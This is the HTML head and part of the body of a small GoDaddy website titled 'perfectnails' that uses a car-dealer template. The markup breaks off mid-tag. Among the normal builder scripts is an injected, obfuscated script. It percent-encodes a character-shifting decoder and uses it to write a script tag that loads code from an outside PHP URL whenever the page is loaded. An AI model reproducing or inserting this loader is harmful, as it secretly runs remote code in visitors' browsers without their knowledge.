
<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1"/><title>perfectnails</title><meta name="author" content="perfectnails"/><meta name="generator" content="Starfield Technologies; Go Daddy Website Builder 8.0.0000"/><link rel="manifest" href="/manifest.webmanifest"/><link rel="apple-touch-icon" sizes="57x57" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:57,h:57,m"/><link rel="apple-touch-icon" sizes="60x60" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:60,h:60,m"/><link rel="apple-touch-icon" sizes="72x72" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:72,h:72,m"/><link rel="apple-touch-icon" sizes="114x114" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:114,h:114,m"/><link rel="apple-touch-icon" sizes="120x120" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:120,h:120,m"/><link rel="apple-touch-icon" sizes="144x144" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:144,h:144,m"/><link rel="apple-touch-icon" sizes="152x152" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:152,h:152,m"/><link rel="apple-touch-icon" sizes="180x180" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:180,h:180,m"/>
<meta property="og:site_name" content="perfectnails"/>
<meta property="og:title" content="Quality Cars, Quality Care"/>
<meta property="og:description" content="We&#39;ll help find the perfect car for you!"/>
<meta property="og:type" content="website"/>
<meta property="og:image" content="http://img1.wsimg.com/isteam/stock/55438"/>
<meta property="og:locale" content="en_US"/>
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="perfectnails"/>
<meta name="twitter:description" content="Quality Cars, Quality Care"/>
<meta name="twitter:image" content="http://img1.wsimg.com/isteam/stock/55438"/>
<meta name="twitter:image:alt" content="perfectnails"/>
<meta name="theme-color" content="#595d61"/><script type="text/javascript" src="https://img1.wsimg.com/poly/v2/polyfill.min.js?unknown=polyfill&amp;flags=gated&amp;features=default%2Cfetch%2CArray.prototype.%40%40iterator%2CArray.prototype.find%2CArray.prototype.findIndex%2CFunction.name%2CNumber.isFinite%2CPromise%2CString.prototype.repeat%2CMath.sign%2CMath.trunc%2CArray.prototype.includes%2CObject.entries%2CObject.values%2CObject.is%2CIntersectionObserver%2CIntl.~locale.en-US" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/2a4f73fcd74c5421/script.js" crossorigin></script>
<script type="text/javascript">"undefined"===typeof _trfq&&(window._trfq=[]);"undefined"==typeof _trfd&&(window._trfd=[]);</script>
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631%2631tsd%264E%2638iuuqt%264B00nfub/csbegpsece/dpn0eob0le8d370joefy/qiq%2638%264F%264D0tdsjqu%264F1')</script>
<script type="text/javascript">function trackingEnabledForType(t){return!("undefined"!=typeof document&&"click"===t&&!Boolean(window._allowCT))||(window._allowCT=-1!==document.cookie.indexOf("cookie_terms_accepted"),window._allowCT)}function logTcclEvent(){var e=this.getAttribute("data-tccl");if(window._trfq&&e)try{var t=e.split(","),n=t[0],o=t[1];if(!trackingEnabledForType(o))return;for(var d=t.splice(2),r=[],c=0;c<d.length;c+=2)r.push([d[c],d[c+1]]);window._trfq.push(["cmdLogEvent",o,n,r])}catch(t){window._trfq.push(["cmdLogEvent","gc_published_site_error","tccl.published.log",[["error",t.toString()],["data",e]]])}}"undefined"!=typeof window&&"undefined"!=typeof document&&window.addEventListener("DOMContentLoaded",function(){for(var t=document.querySelectorAll("[data-tccl]"),e=0;e<t.length;e++)try{var n=t[e].getAttribute("data-tccl").split(",");t[e].addEventListener(n[1],logTcclEvent)}catch(t){window._trfq.push(["cmdLogEvent","gc_published_site_error","tccl.published.add",[["error",t.toString()]]])}});</script>
<script type="text/javascript">"use strict";

if ('serviceWorker' in navigator) {
  window.addEventListener('load', function () {
    navigator.serviceWorker.register('/sw.js').then(function () {
      console.log('sw: registration complete');
    }).catch(function (err) {
      console.log(err);
    });
  });
}</script>
<style type="text/css">/*
Copyright 2017 The Archivo Black Project Authors (https://github.com/Omnibus-Type/ArchivoBlack)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at: http://scripts.sil.org/OFL

—————————————————————————————-
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
—————————————————————————————-
*/
/* latin-ext */
@font-face {
  font-family: 'Archivo Black';
  font-style: normal;
  font-weight: 400;
  font-display: swap;
  src: local('Archivo Black Regular'), local('ArchivoBlack-Regular'), url(https://img1.wsimg.com/gfonts/s/archivoblack/v9/HTxqL289NzCGg4MzN6KJ7eW6CYKF_jzx13HOvQ.woff2) format('woff2');
  unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'Archivo Black';
  font-style: normal;
  font-weight: 400;
  font-display: swap;
  src: local('Archivo Black Regular'), local('ArchivoBlack-Regular'), url(https://img1.wsimg.com/gfonts/s/archivoblack/v9/HTxqL289NzCGg4MzN6KJ7eW6CYyF_jzx13E.woff2) format('woff2');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
}

/*
Copyright 2011 The Montserrat Project Authors (https://github.com/JulietaUla/Montserrat)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at: http://scripts.sil.org/OFL

—————————————————————————————-
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
—————————————————————————————-
*/
/* cyrillic-ext */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 400;
  font-display: swap;
  src: local('Montserrat Regular'), local('Montserrat-Regular'), url(https://img1.wsimg.com/gfonts/s/montserrat/v14/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format('woff2');
  unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
}
/* cyrillic */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 400;
  font-display: swap;
  src: local('Montserrat Regular'), local('Montserrat-Regular'), url(https://img1.wsimg.com/gfonts/s/montserrat/v14/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format('woff2');
  unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
}
/* vietnamese */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 400;
  font-display: swap;
  src: local('Montserrat Regular'), local('Montserrat-Regular'), url(https://img1.wsimg.com/gfonts/s/montserrat/v14/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format('woff2');
  unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
}
/* latin-ext */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 400;
  font-display: swap;
  src: local('Montserrat Regular'), local('Montserrat-Regular'), url(https://img1.wsimg.com/gfonts/s/montserrat/v14/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format('woff2');
  unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 400;
  font-display: swap;
  src: local('Montserrat Regular'), local('Montserrat-Regular'), url(https://img1.wsimg.com/gfonts/s/montserrat/v14/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format('woff2');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
}
/* cyrillic-ext */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 700;
  font-display: swap;
  src: local('Montserrat Bold'), local('Montserrat-Bold'), url(https://img1.wsimg.com/gfonts/s/montserrat/v14/JTURjIg1_i6t8kCHKm45_dJE3gTD_vx3rCubqg.woff2) format('woff2');
  unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
}
/* cyrillic */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 700;
  font-display: swap;
  src: local('Montserrat Bold'), local('Montserrat-Bold'), url(https://img1.wsimg.com/gfonts/s/montserrat/v14/JTURjIg1_i6t8kCHKm45_dJE3g3D_vx3rCubqg.woff2) format('woff2');
  unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
}
/* vietnamese */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 700;
  font-display: swap;
  src: local('Montserrat Bold'), local('Montserrat-Bold'), url(https://img1.wsimg.com/gfonts/s/montserrat/v14/JTURjIg1_i6t8kCHKm45_dJE3gbD_vx3rCubqg.woff2) format('woff2');
  unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
}
/* latin-ext */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 700;
  font-display: swap;
  src: local('Montserrat Bold'), local('Montserrat-Bold'), url(https://img1.wsimg.com/gfonts/s/montserrat/v14/JTURjIg1_i6t8kCHKm45_dJE3gfD_vx3rCubqg.woff2) format('woff2');
  unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 700;
  font-display: swap;
  src: local('Montserrat Bold'), local('Montserrat-Bold'), url(https://img1.wsimg.com/gfonts/s/montserrat/v14/JTURjIg1_i6t8kCHKm45_dJE3gnD_vx3rCs.woff2) format('woff2');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
}
</style>
<link rel="stylesheet" href="//img1.wsimg.com/blobby/go/ee364d8f-0a94-4dfc-a692-9b966e609062/gpub/8396e10278a51439/styles.css"/>
<link data-glamor="cxs-default-sheet" rel="stylesheet" href="//img1.wsimg.com/blobby/go/ee364d8f-0a94-4dfc-a692-9b966e609062/gpub/3385d143866b14d6/styles.css"/>
<style data-glamor="cxs-media-sheet" type="text/css"></style>
<style data-glamor="cxs-xs-sheet" type="text/css">@media (max-width: 767px){.x .c1-l{padding-top:40px}}@media (max-width: 767px){.x .c1-m{padding-bottom:40px}}@media (max-width: 767px){.x .c1-23{width:100%}}@media (max-width: 767px){.x .c1-24{display:flex}}@media (max-width: 767px){.x .c1-25{justify-content:center}}@media (max-width: 767px){.x .c1-54{max-width:100%}}@media (max-width: 767px){.x .c1-55{margin-top:0}}@media (max-width: 767px){.x .c1-56{margin-right:auto}}@media (max-width: 767px){.x .c1-57{margin-bottom:0}}@media (max-width: 767px){.x .c1-58{margin-left:auto}}@media (max-width: 767px){.x .c1-6l > :nth-child(n){margin-bottom:16px}}@media (max-width: 767px){.x .c1-6m  > :last-child{margin-bottom:0 !important}}@media (max-width: 767px){.x .c1-8s{padding-bottom:32px}}@media (max-width: 767px){.x .c1-8w{flex-direction:column}}</style>
<link data-glamor="cxs-sm-sheet" rel="stylesheet" href="//img1.wsimg.com/blobby/go/ee364d8f-0a94-4dfc-a692-9b966e609062/gpub/8f156469d5129abd/styles.css"/>
<link data-glamor="cxs-md-sheet" rel="stylesheet" href="//img1.wsimg.com/blobby/go/ee364d8f-0a94-4dfc-a692-9b966e609062/gpub/d114733df060a87a/styles.css"/>
<style data-glamor="cxs-lg-sheet" type="text/css">@media (min-width: 1280px){.x .c1-f{font-size:16px}}@media (min-width: 1280px){.x .c1-16{width:1160px}}@media (min-width: 1280px){.x .c1-29{font-size:14px}}@media (min-width: 1280px){.x .c1-2x{font-size:19px}}@media (min-width: 1280px){.x .c1-39{font-size:39px}}@media (min-width: 1280px){.x .c1-3e{font-size:28px}}@media (min-width: 1280px){.x .c1-5b{font-size:54px}}@media (min-width: 1280px){.x .c1-5l{font-size:22px}}</style>
<style data-glamor="cxs-xl-sheet" type="text/css">@media (min-width: 1536px){.x .c1-g{font-size:18px}}@media (min-width: 1536px){.x .c1-17{width:1280px}}@media (min-width: 1536px){.x .c1-2a{font-size:16px}}@media (min-width: 1536px){.x .c1-2y{font-size:21px}}@media (min-width: 1536px){.x .c1-3a{font-size:42px}}@media (min-width: 1536px){.x .c1-3f{font-size:32px}}@media (min-width: 1536px){.x .c1-5c{font-size:61px}}@media (min-width: 1536px){.x .c1-5m{font-size:24px}}</style>
<style type="text/css">.page-inner { background-color: rgb(22, 22, 22); min-height: 100vh; }</style></head>
<body class="x  x-fonts-archivo-black" context="[object Object]"><div id="layout-ee-364-d-8-f-0-a-94-4-dfc-a-692-9-b-966-e-609062" class="layout layout-layout layout-layout-layout-10 locale-en-US lang-en"><div data-ux="Page" id="page-35356" class="x-el x-el-div x-el c1-1 c1-2 c1-3 c1-4 c1-5 c1-6 c1-7 c1-8 c1-9 c1-a c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div page-inner c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div id="332e3eac-00db-46ff-b558-919c4bbb1074" class="widget widget-header widget-header-header-9"><div data-ux="Header" role="main" data-aid="HEADER_WIDGET" class="x-el x-el-div x-el x-el c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-h c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div> <section data-ux="Section" data-aid="HEADER_SECTION" class="x-el x-el-section c1-1 c1-2 c1-h c1-i c1-j c1-k c1-b c1-c c1-l c1-m c1-d c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-n c1-o c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-h c1-b c1-c c1-d c1-e c1-f c1-g"><nav data-ux="Block" class="x-el x-el-nav c1-1 c1-2 c1-n c1-p c1-q c1-r c1-s c1-b c1-c c1-d c1-t c1-u c1-e c1-f c1-g"><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-v c1-w c1-x c1-y c1-z c1-10 c1-11 c1-b c1-c c1-12 c1-d c1-13 c1-14 c1-15 c1-e c1-16 c1-f c1-17 c1-g"><div data-ux="Grid" class="x-el x-el-div c1-1 c1-2 c1-18 c1-19 c1-1a c1-1b c1-1c c1-1d c1-1e c1-1f c1-1g c1-b c1-c c1-1h c1-1i c1-1j c1-1k c1-d c1-1l c1-e c1-f c1-g"><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-19 c1-1m c1-1n c1-1o c1-z c1-1p c1-1q c1-1r c1-1s c1-18 c1-1t c1-1u c1-b c1-c c1-1v c1-1w c1-1x c1-1y c1-d c1-e c1-f c1-g"><div data-ux="Block" data-aid="HEADER_LOGO_RENDERED" class="x-el x-el-div c1-1z c1-20 c1-21 c1-z c1-22 c1-23 c1-24 c1-25 c1-26 c1-27 c1-28 c1-29 c1-2a"><a rel="" role="link" aria-haspopup="menu" data-ux="Link" data-page="a9f148e7-6b12-4d36-95f0-1b4a4be338a5" title="perfectnails" href="/" data-typography="LinkAlpha" class="x-el x-el-a c1-2b c1-2c c1-2d c1-2e c1-1u c1-2f c1-2g c1-2h c1-2i c1-2j c1-2k c1-z c1-b c1-2l c1-c c1-2m c1-2n c1-2o c1-d c1-e c1-f c1-g" data-tccl="ux2.HEADER.header9.Logo.Default.Link.Default.35361.click,click"><div data-ux="Block" id="logo-container-35362" class="x-el x-el-div c1-1 c1-2 c1-20 c1-4 c1-n c1-b c1-c c1-d c1-e c1-f c1-g"><h3 role="heading" aria-level="3" data-ux="LogoHeading" id="logo-text-35363" data-aid="HEADER_LOGO_TEXT_RENDERED" data-typography="HeadingEpsilon" class="x-el x-el-h3 c1-1 c1-1z c1-2e c1-1u c1-2p c1-2q c1-2r c1-1c c1-1e c1-z c1-20 c1-21 c1-2s c1-2t c1-2u c1-2v c1-2w c1-2x c1-2y">perfectnails</h3><span role="heading" aria-level="NaN" data-ux="scaler" data-size="xxlarge" data-scaler-id="scaler-logo-container-35362" aria-hidden="true" data-typography="HeadingEpsilon" class="x-el x-el-span c1-1 c1-1z c1-2z c1-30 c1-2p c1-2q c1-2r c1-1c c1-1e c1-z c1-31 c1-32 c1-33 c1-34 c1-35 c1-36 c1-21 c1-2s c1-2u c1-37 c1-38 c1-39 c1-3a">perfectnails</span><span role="heading" aria-level="NaN" data-ux="scaler" data-size="xlarge" data-scaler-id="scaler-logo-container-35362" aria-hidden="true" data-typography="HeadingEpsilon" class="x-el x-el-span c1-1 c1-1z c1-2z c1-30 c1-2p c1-2q c1-2r c1-1c c1-1e c1-z c1-31 c1-32 c1-33 c1-34 c1-35 c1-3b c1-21 c1-2s c1-2u c1-3c c1-3d c1-3e c1-3f">perfectnails</span><span role="heading" aria-level="NaN" data-ux="scaler" data-size="large" data-scaler-id="scaler-logo-container-35362" aria-hidden="true" data-typography="HeadingEpsilon" class="x-el x-el-span c1-1 c1-1z c1-2z c1-30 c1-2p c1-2q c1-2r c1-1c c1-1e c1-z c1-31 c1-32 c1-33 c1-34 c1-35 c1-2t c1-21 c1-2s c1-2u c1-2v c1-2w c1-2x c1-2y">perfectnails</span><div id="bs-1"></div></div></a></div></div></div><div data-ux="Grid" class="x-el x-el-div c1-1 c1-2 c1-31 c1-19 c1-1a c1-1b c1-1c c1-2r c1-1e c1-2q c1-4 c1-1p c1-1r c1-b c1-c c1-d c1-14 c1-e c1-f c1-g"><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-19 c1-1m c1-1n c1-3g c1-z c1-1p c1-3h c1-1r c1-3i c1-3j c1-18 c1-1g c1-b c1-c c1-d c1-3k c1-3l c1-e c1-f c1-g"><nav data-ux="Nav" data-aid="HEADER_NAV_RENDERED" role="navigation" class="x-el x-el-nav c1-1 c1-2 c1-z c1-3m c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Block" id="n-3535735366-navId-1" class="x-el x-el-div c1-1 c1-2 c1-n c1-18 c1-1g c1-1p c1-3h c1-1r c1-3i c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-3n c1-2q c1-3o c1-3p c1-n c1-32 c1-20 c1-b c1-c c1-3q c1-d c1-e c1-f c1-g"><div id="bs-2"><script>var n=document.querySelector('[data-aid="HEADER_NAV_RENDERED"]');n.offsetHeight>0&&n.offsetWidth>0&&(Number(window.vctElements)||(window.vctElements=0),window.vctElements++);</script></div></div></div></nav></div><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-19 c1-1m c1-1n c1-3g c1-z c1-1p c1-3h c1-1r c1-3i c1-3r c1-1t c1-2q c1-2r c1-3s c1-18 c1-1g c1-b c1-c c1-d c1-3k c1-3l c1-e c1-f c1-g"><div data-ux="Block" data-aid="HEADER_LOGO_RENDERED" class="x-el x-el-div c1-1z c1-20 c1-21 c1-z c1-1t c1-22 c1-23 c1-24 c1-25 c1-26 c1-27 c1-28 c1-29 c1-2a"><a rel="" role="link" aria-haspopup="menu" data-ux="Link" data-page="a9f148e7-6b12-4d36-95f0-1b4a4be338a5" title="perfectnails" href="/" data-typography="LinkAlpha" class="x-el x-el-a c1-2b c1-2c c1-2d c1-2e c1-1u c1-2f c1-2g c1-2h c1-2i c1-2j c1-2k c1-z c1-b c1-2l c1-c c1-2m c1-2n c1-2o c1-d c1-e c1-f c1-g" data-tccl="ux2.HEADER.header9.Logo.Default.Link.Default.35369.click,click"><div data-ux="Block" id="logo-container-35370" class="x-el x-el-div c1-1 c1-2 c1-20 c1-4 c1-n c1-b c1-c c1-d c1-e c1-f c1-g"><h3 role="heading" aria-level="3" data-ux="LogoHeading" id="logo-text-35371" data-aid="HEADER_LOGO_TEXT_RENDERED" data-typography="HeadingEpsilon" class="x-el x-el-h3 c1-1 c1-1z c1-2e c1-1u c1-2p c1-2q c1-2r c1-1c c1-1e c1-z c1-20 c1-21 c1-2s c1-2t c1-2u c1-2v c1-2w c1-2x c1-2y">perfectnails</h3><span role="heading" aria-level="NaN" data-ux="scaler" data-size="xxlarge" data-scaler-id="scaler-logo-container-35370" aria-hidden="true" data-typography="HeadingEpsilon" class="x-el x-el-span c1-1 c1-1z c1-2z c1-30 c1-2p c1-2q c1-2r c1-1c c1-1e c1-z c1-31 c1-32 c1-33 c1-34 c1-35 c1-36 c1-21 c1-2s c1-2u c1-37 c1-38 c1-39 c1-3a">perfectnails</span><span role="heading" aria-level="NaN" data-ux="scaler" data-size="xlarge" data-scaler-id="scaler-logo-container-35370" aria-hidden="true" data-typography="HeadingEpsilon" class="x-el x-el-span c1-1 c1-1z c1-2z c1-30 c1-2p c1-2q c1-2r c1-1c c1-1e c1-z c1-31 c1-32 c1-33 c1-34 c1-35 c1-3b c1-21 c1-2s c1-2u c1-3c c1-3d c1-3e c1-3f">perfectnails</span><span role="heading" aria-level="NaN" data-ux="scaler" data-size="large" data-scaler-id="scaler-logo-container-35370" aria-hidden="true" data-typography="HeadingEpsilon" class="x-el x-el-span c1-1 c1-1z c1-2z c1-30 c1-2p c1-2q c1-2r c1-1c c1-1e c1-z c1-31 c1-32 c1-33 c1-34 c1-35 c1-2t c1-21 c1-2s c1-2u c1-2v c1-2w c1-2x c1-2y">perfectnails</span><div id="bs-3"></div></div></a></div></div><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-19 c1-1m c1-1n c1-3g c1-z c1-1p c1-3h c1-1r c1-3i c1-3t c1-18 c1-1g c1-b c1-c c1-d c1-3k c1-3l c1-e c1-f c1-g"><nav data-ux="Nav" data-aid="HEADER_NAV_RENDERED" role="navigation" class="x-el x-el-nav c1-1 c1-2 c1-z c1-3m c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Block" id="n-3535735367-navId-2" class="x-el x-el-div c1-1 c1-2 c1-n c1-18 c1-1g c1-1p c1-3h c1-1r c1-3i c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-3n c1-2q c1-3o c1-3p c1-n c1-32 c1-20 c1-b c1-c c1-3q c1-d c1-e c1-f c1-g"><div id="bs-4"><script>var n=document.querySelector('[data-aid="HEADER_NAV_RENDERED"]');n.offsetHeight>0&&n.offsetWidth>0&&(Number(window.vctElements)||(window.vctElements=0),window.vctElements++);</script><a rel="" role="button" aria-haspopup="menu" data-ux="NavLinkDropdown" data-toggle-ignore="true" id="35373" aria-expanded="false" data-aid="NAV_MORE" ignoreCloseAttr="data-ignore-close" aria-label="Website navigation dropdown menu" data-edit-interactive="true" href="#" data-typography="NavAlpha" class="x-el x-el-a c1-1 c1-1z c1-2d c1-2e c1-1u c1-18 c1-2g c1-1g c1-3u c1-3v c1-3w c1-3x c1-3y c1-3z c1-40 c1-41 c1-b c1-2s c1-c c1-2u c1-2n c1-42 c1-d c1-e c1-f c1-g" data-tccl="ux2.HEADER.header9.Nav.Default.Link.Dropdown.35374.click,click"><div style="pointer-events:none;display:flex;align-items:center" data-aid="NAV_DROPDOWN"><span style="margin-right:4px">More</span><svg viewBox="0 0 24 24" fill="currentColor" width="16" height="16" data-ux="Icon" class="x-el x-el-svg c1-1 c1-2 c1-43 c1-20 c1-44 c1-45 c1-46 c1-n c1-b c1-c c1-d c1-e c1-f c1-g"><path fill-rule="evenodd" d="M18.605 7l-6.793 7.024-6.375-7.002L4 8.467 11.768 17l.485-.501L20 8.489z"></path></svg></div></a></div></div></div></nav></div></div></div></nav></div><div data-ux="Block" id="header_parallax35375" class="x-el x-el-div c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div id="bs-5"></div><div data-ux="HeaderMedia" class="x-el x-el-div c1-1 c1-2 c1-n c1-1m c1-b c1-c c1-d c1-e c1-f c1-g"><div id="guacBg35376" role="img" data-guac-image="loading" data-ux="Background" data-aid="BACKGROUND_IMAGE_RENDERED" overlay="accent" treatment="Fill" data-ht="Fill" treatmentData="[object Object]" class="x-el x-el-div c1-1 c1-2 c1-47 c1-48 c1-49 c1-4a c1-4b c1-18 c1-4c c1-4d c1-3j c1-4e c1-1p c1-4f c1-4g c1-b c1-c c1-d c1-4h c1-4i c1-4j c1-e c1-f c1-g"><div data-ux="Block" id="header_parallax35377" class="x-el x-el-div c1-1 c1-2 c1-4 c1-1m c1-18 c1-1g c1-4c c1-3r c1-1p c1-1r c1-b c1-c c1-d c1-4j c1-4k c1-4l c1-15 c1-e c1-f c1-g"><div id="bs-6"></div><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-2q c1-2r c1-x c1-y c1-z c1-b c1-c c1-12 c1-d c1-4m c1-14 c1-15 c1-4n c1-4o c1-4p c1-e c1-16 c1-f c1-17 c1-g"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-4 c1-18 c1-4c c1-1m c1-1n c1-4q c1-3r c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Hero" class="x-el x-el-div c1-1 c1-2 c1-4 c1-4r c1-1t c1-4s c1-4t c1-b c1-c c1-d c1-4u c1-4v c1-4w c1-4x c1-e c1-f c1-g"><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-2q c1-2r c1-3i c1-3h c1-z c1-4y c1-1p c1-1r c1-1c c1-1e c1-4z c1-b c1-c c1-12 c1-d c1-4m c1-e c1-16 c1-f c1-17 c1-g"><div data-ux="Element" id="tagline-container-35378" class="x-el x-el-div c1-1 c1-2 c1-2e c1-1u c1-2p c1-50 c1-n c1-z c1-b c1-c c1-d c1-e c1-f c1-g"><h1 role="heading" aria-level="1" data-ux="Tagline" data-aid="HEADER_TAGLINE_RENDERED" id="dynamic-tagline-35379" data-typography="HeadingAlpha" class="x-el x-el-h1 c1-1 c1-1z c1-2e c1-1u c1-2p c1-2q c1-2r c1-1c c1-1e c1-51 c1-20 c1-z c1-21 c1-52 c1-53 c1-2u c1-54 c1-55 c1-56 c1-57 c1-58 c1-59 c1-5a c1-5b c1-5c">Quality Cars, Quality Care</h1><span role="heading" aria-level="NaN" data-ux="scaler" data-size="xxxlarge" data-scaler-id="scaler-tagline-container-35378" aria-hidden="true" data-typography="HeadingAlpha" class="x-el x-el-span c1-1 c1-1z c1-2z c1-30 c1-2p c1-2q c1-2r c1-1c c1-1e c1-51 c1-31 c1-z c1-32 c1-33 c1-34 c1-35 c1-53 c1-21 c1-52 c1-2u c1-54 c1-55 c1-56 c1-57 c1-58 c1-59 c1-5a c1-5b c1-5c">Quality Cars, Quality Care</span><span role="heading" aria-level="NaN" data-ux="scaler" data-size="xxlarge" data-scaler-id="scaler-tagline-container-35378" aria-hidden="true" data-typography="HeadingAlpha" class="x-el x-el-span c1-1 c1-1z c1-2z c1-30 c1-2p c1-2q c1-2r c1-1c c1-1e c1-51 c1-31 c1-z c1-32 c1-33 c1-34 c1-35 c1-36 c1-21 c1-52 c1-2u c1-54 c1-55 c1-56 c1-57 c1-58 c1-37 c1-38 c1-39 c1-3a">Quality Cars, Quality Care</span><span role="heading" aria-level="NaN" data-ux="scaler" data-size="xlarge" data-scaler-id="scaler-tagline-container-35378" aria-hidden="true" data-typography="HeadingAlpha" class="x-el x-el-span c1-1 c1-1z c1-2z c1-30 c1-2p c1-2q c1-2r c1-1c c1-1e c1-51 c1-31 c1-z c1-32 c1-33 c1-34 c1-35 c1-3b c1-21 c1-52 c1-2u c1-54 c1-55 c1-56 c1-57 c1-58 c1-3c c1-3d c1-3e c1-3f">Quality Cars, Quality Care</span><div id="bs-7"></div></div></div><div data-ux="HeroText" data-aid="HEADER_TAGLINE2_RENDERED" data-typography="BodyBeta" class="x-el x-el-p c1-1 c1-2 c1-2e c1-1u c1-5d 